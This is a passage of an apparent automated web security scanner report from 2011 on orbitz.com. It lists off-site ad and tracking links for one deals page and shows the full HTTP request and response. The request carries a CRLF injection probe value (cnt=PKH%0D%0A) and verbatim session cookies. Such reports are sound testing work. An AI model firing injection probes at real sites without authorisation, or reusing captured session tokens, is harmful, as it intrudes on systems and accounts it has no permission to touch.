<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662791035&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.346. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=allinclusive&cnt=PKH%0D%0A&type=vd_dp&z=2ece&r=x

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=allinclusive&cnt=PKH%0D%0A&type=vd_dp&z=2ece&r=x HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=A07DE67D03EC20D928067F9F3AE06144; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:38 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 453580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=US&area=DPT&country=NA&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=ALLINCLUSIVE&tile=1296662799595&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
